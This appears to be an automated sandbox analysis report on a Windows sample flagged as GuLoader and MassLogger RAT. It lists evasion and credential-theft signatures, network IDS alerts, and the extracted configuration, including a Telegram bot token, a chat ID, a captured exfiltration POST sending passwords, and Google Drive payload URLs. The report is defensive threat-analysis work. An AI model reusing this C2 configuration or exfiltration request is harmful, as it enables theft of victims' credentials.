Edit tour

Windows Analysis Report
6ZoBPR3isG.exe

Overview

General Information

Sample name:	6ZoBPR3isG.exe renamed because original name is a hash value
Original sample name:	e8e552351ba3c8a3f713a970b114fb7b80bd6474f62a88b977fe3bc35b57e9a7.exe
Analysis ID:	1588191
MD5:	dcae922f4d3c1946b3c41158be23dc2a
SHA1:	13e891bfc3bcd410b284986d7baf8672255dcbdb
SHA256:	e8e552351ba3c8a3f713a970b114fb7b80bd6474f62a88b977fe3bc35b57e9a7
Tags:	exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected MassLogger RAT

Yara detected Telegram RAT

AI detected suspicious sample

Disable Task Manager(disabletaskmgr)

Disables CMD prompt

Disables the Windows task manager (taskmgr)

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

6ZoBPR3isG.exe (PID: 7760 cmdline: "C:\Users\user\Desktop\6ZoBPR3isG.exe" MD5: DCAE922F4D3C1946B3C41158BE23DC2A)

6ZoBPR3isG.exe (PID: 8068 cmdline: "C:\Users\user\Desktop\6ZoBPR3isG.exe" MD5: DCAE922F4D3C1946B3C41158BE23DC2A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1650191934.0000000003386000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000003.00000002.2616593291.00000000017C6000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: 6ZoBPR3isG.exe PID: 8068	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: 6ZoBPR3isG.exe PID: 8068	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 6ZoBPR3isG.exe PID: 8068	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 3 entries

Suricata Signatures

ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T22:31:42.795136+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	49981	149.154.167.220	443	TCP
2025-01-10T22:31:44.660547+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	49983	149.154.167.220	443	TCP
2025-01-10T22:31:46.373821+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	49986	149.154.167.220	443	TCP
2025-01-10T22:31:48.072800+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	49988	149.154.167.220	443	TCP
2025-01-10T22:31:49.912050+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	49990	149.154.167.220	443	TCP
2025-01-10T22:31:51.599034+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	49992	149.154.167.220	443	TCP
2025-01-10T22:31:53.232416+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	49994	149.154.167.220	443	TCP
2025-01-10T22:31:54.979558+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	49996	149.154.167.220	443	TCP
2025-01-10T22:31:56.646913+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	49998	149.154.167.220	443	TCP
2025-01-10T22:31:58.500953+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50000	149.154.167.220	443	TCP
2025-01-10T22:32:00.211457+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50002	149.154.167.220	443	TCP
2025-01-10T22:32:02.065451+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50004	149.154.167.220	443	TCP
2025-01-10T22:32:03.695686+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50006	149.154.167.220	443	TCP
2025-01-10T22:32:05.323955+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50008	149.154.167.220	443	TCP
2025-01-10T22:32:06.842799+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50010	149.154.167.220	443	TCP
2025-01-10T22:32:08.522045+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50012	149.154.167.220	443	TCP
2025-01-10T22:32:10.028089+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50014	149.154.167.220	443	TCP
2025-01-10T22:32:11.703832+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50016	149.154.167.220	443	TCP
2025-01-10T22:32:13.305255+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50018	149.154.167.220	443	TCP
2025-01-10T22:32:14.921617+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50020	149.154.167.220	443	TCP
2025-01-10T22:32:16.558067+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50022	149.154.167.220	443	TCP
2025-01-10T22:32:18.201123+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50024	149.154.167.220	443	TCP
2025-01-10T22:32:20.147674+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50026	149.154.167.220	443	TCP
2025-01-10T22:32:21.894411+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50028	149.154.167.220	443	TCP
2025-01-10T22:32:23.550116+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50030	149.154.167.220	443	TCP
2025-01-10T22:32:25.157811+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50032	149.154.167.220	443	TCP
2025-01-10T22:32:26.822595+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50034	149.154.167.220	443	TCP
2025-01-10T22:32:28.441661+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50036	149.154.167.220	443	TCP
2025-01-10T22:32:30.103458+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50038	149.154.167.220	443	TCP
2025-01-10T22:32:31.717161+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50040	149.154.167.220	443	TCP
2025-01-10T22:32:33.368274+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50042	149.154.167.220	443	TCP
2025-01-10T22:32:34.949518+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50044	149.154.167.220	443	TCP
2025-01-10T22:32:36.635993+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50046	149.154.167.220	443	TCP
2025-01-10T22:32:38.396117+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50048	149.154.167.220	443	TCP
2025-01-10T22:32:40.009407+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50050	149.154.167.220	443	TCP
2025-01-10T22:32:41.690988+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50052	149.154.167.220	443	TCP
2025-01-10T22:32:43.422528+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50054	149.154.167.220	443	TCP
2025-01-10T22:32:45.173689+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50056	149.154.167.220	443	TCP
2025-01-10T22:32:46.910708+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50058	149.154.167.220	443	TCP
2025-01-10T22:32:48.558073+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50060	149.154.167.220	443	TCP
2025-01-10T22:32:50.365152+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50062	149.154.167.220	443	TCP
2025-01-10T22:32:52.063956+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50064	149.154.167.220	443	TCP
2025-01-10T22:32:53.608952+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50066	149.154.167.220	443	TCP
2025-01-10T22:32:55.407874+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50068	149.154.167.220	443	TCP
2025-01-10T22:32:57.073739+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50070	149.154.167.220	443	TCP
2025-01-10T22:33:01.419984+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.3	50072	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T22:31:34.578497+0100	2803274	2	Potentially Bad Traffic	192.168.2.3	49979	132.226.247.73	80	TCP
2025-01-10T22:31:41.875333+0100	2803274	2	Potentially Bad Traffic	192.168.2.3	49979	132.226.247.73	80	TCP
2025-01-10T22:31:43.734718+0100	2803274	2	Potentially Bad Traffic	192.168.2.3	49982	132.226.247.73	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T22:31:28.793002+0100	2803270	2	Potentially Bad Traffic	192.168.2.3	49957	172.217.16.206	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T22:31:42.502681+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	49981	149.154.167.220	443	TCP
2025-01-10T22:31:44.296888+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	49983	149.154.167.220	443	TCP
2025-01-10T22:31:46.023661+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	49986	149.154.167.220	443	TCP
2025-01-10T22:31:47.725131+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	49988	149.154.167.220	443	TCP
2025-01-10T22:31:49.422005+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	49990	149.154.167.220	443	TCP
2025-01-10T22:31:51.226907+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	49992	149.154.167.220	443	TCP
2025-01-10T22:31:52.992362+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	49994	149.154.167.220	443	TCP
2025-01-10T22:31:54.576520+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	49996	149.154.167.220	443	TCP
2025-01-10T22:31:56.344110+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	49998	149.154.167.220	443	TCP
2025-01-10T22:31:58.069972+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50000	149.154.167.220	443	TCP
2025-01-10T22:31:59.844867+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50002	149.154.167.220	443	TCP
2025-01-10T22:32:01.560579+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50004	149.154.167.220	443	TCP
2025-01-10T22:32:03.401380+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50006	149.154.167.220	443	TCP
2025-01-10T22:32:05.014421+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50008	149.154.167.220	443	TCP
2025-01-10T22:32:06.626429+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50010	149.154.167.220	443	TCP
2025-01-10T22:32:08.187001+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50012	149.154.167.220	443	TCP
2025-01-10T22:32:09.814826+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50014	149.154.167.220	443	TCP
2025-01-10T22:32:11.486908+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50016	149.154.167.220	443	TCP
2025-01-10T22:32:13.012727+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50018	149.154.167.220	443	TCP
2025-01-10T22:32:14.625484+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50020	149.154.167.220	443	TCP
2025-01-10T22:32:16.250162+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50022	149.154.167.220	443	TCP
2025-01-10T22:32:17.871356+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50024	149.154.167.220	443	TCP
2025-01-10T22:32:19.521958+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50026	149.154.167.220	443	TCP
2025-01-10T22:32:21.566377+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50028	149.154.167.220	443	TCP
2025-01-10T22:32:23.239141+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50030	149.154.167.220	443	TCP
2025-01-10T22:32:24.930723+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50032	149.154.167.220	443	TCP
2025-01-10T22:32:26.485485+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50034	149.154.167.220	443	TCP
2025-01-10T22:32:28.148054+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50036	149.154.167.220	443	TCP
2025-01-10T22:32:29.807757+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50038	149.154.167.220	443	TCP
2025-01-10T22:32:31.428691+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50040	149.154.167.220	443	TCP
2025-01-10T22:32:33.080521+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50042	149.154.167.220	443	TCP
2025-01-10T22:32:34.684760+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50044	149.154.167.220	443	TCP
2025-01-10T22:32:36.272050+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50046	149.154.167.220	443	TCP
2025-01-10T22:32:37.963363+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50048	149.154.167.220	443	TCP
2025-01-10T22:32:39.727964+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50050	149.154.167.220	443	TCP
2025-01-10T22:32:41.335109+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50052	149.154.167.220	443	TCP
2025-01-10T22:32:43.019779+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50054	149.154.167.220	443	TCP
2025-01-10T22:32:44.755265+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50056	149.154.167.220	443	TCP
2025-01-10T22:32:46.491451+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50058	149.154.167.220	443	TCP
2025-01-10T22:32:48.273116+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50060	149.154.167.220	443	TCP
2025-01-10T22:32:49.876435+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50062	149.154.167.220	443	TCP
2025-01-10T22:32:51.682684+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50064	149.154.167.220	443	TCP
2025-01-10T22:32:53.379112+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50066	149.154.167.220	443	TCP
2025-01-10T22:32:54.999588+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50068	149.154.167.220	443	TCP
2025-01-10T22:32:56.736013+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50070	149.154.167.220	443	TCP
2025-01-10T22:33:01.011858+0100	1810008	1	Potentially Bad Traffic	192.168.2.3	50072	149.154.167.220	443	TCP

HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd319443444d0bHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive

Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034470000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003433A000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000344B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndn
Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034470000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003433A000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000344B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034470000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034131000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000342EF000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003433A000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000344B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: 6ZoBPR3isG.exe, 00000003.00000002.2645850527.00000000369D0000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034131000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.2361992103.0000000036A51000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2645927513.0000000036A6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: 6ZoBPR3isG.exe, 00000003.00000003.2361992103.0000000036A51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/M
Source: 6ZoBPR3isG.exe, 00000003.00000003.2361992103.0000000036A51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/U
Source: 6ZoBPR3isG.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000344B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram
Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000341F7000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034470000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003420D000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000342EF000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003433A000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000344B9000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000342D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org.S
Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000342D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382
Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgL
Source: 6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: 6ZoBPR3isG.exe, 00000003.00000002.2621340105.0000000003D37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: 6ZoBPR3isG.exe, 00000003.00000002.2621340105.0000000003D75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1C_FIUBUbXxo5lMNTlwG535Op9uD8rNbe
Source: 6ZoBPR3isG.exe, 00000003.00000002.2621340105.0000000003DAB000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1770546825.0000000003DAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: 6ZoBPR3isG.exe, 00000003.00000002.2621340105.0000000003DAB000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1770546825.0000000003DAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/0
Source: 6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2621340105.0000000003D37000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1770546825.0000000003DAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1C_FIUBUbXxo5lMNTlwG535Op9uD8rNbe&export=download
Source: 6ZoBPR3isG.exe, 00000003.00000003.1770546825.0000000003DAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1C_FIUBUbXxo5lMNTlwG535Op9uD8rNbe&export=download&
Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: 6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: 6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: 6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: 6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: 6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: 6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: 6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: 6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
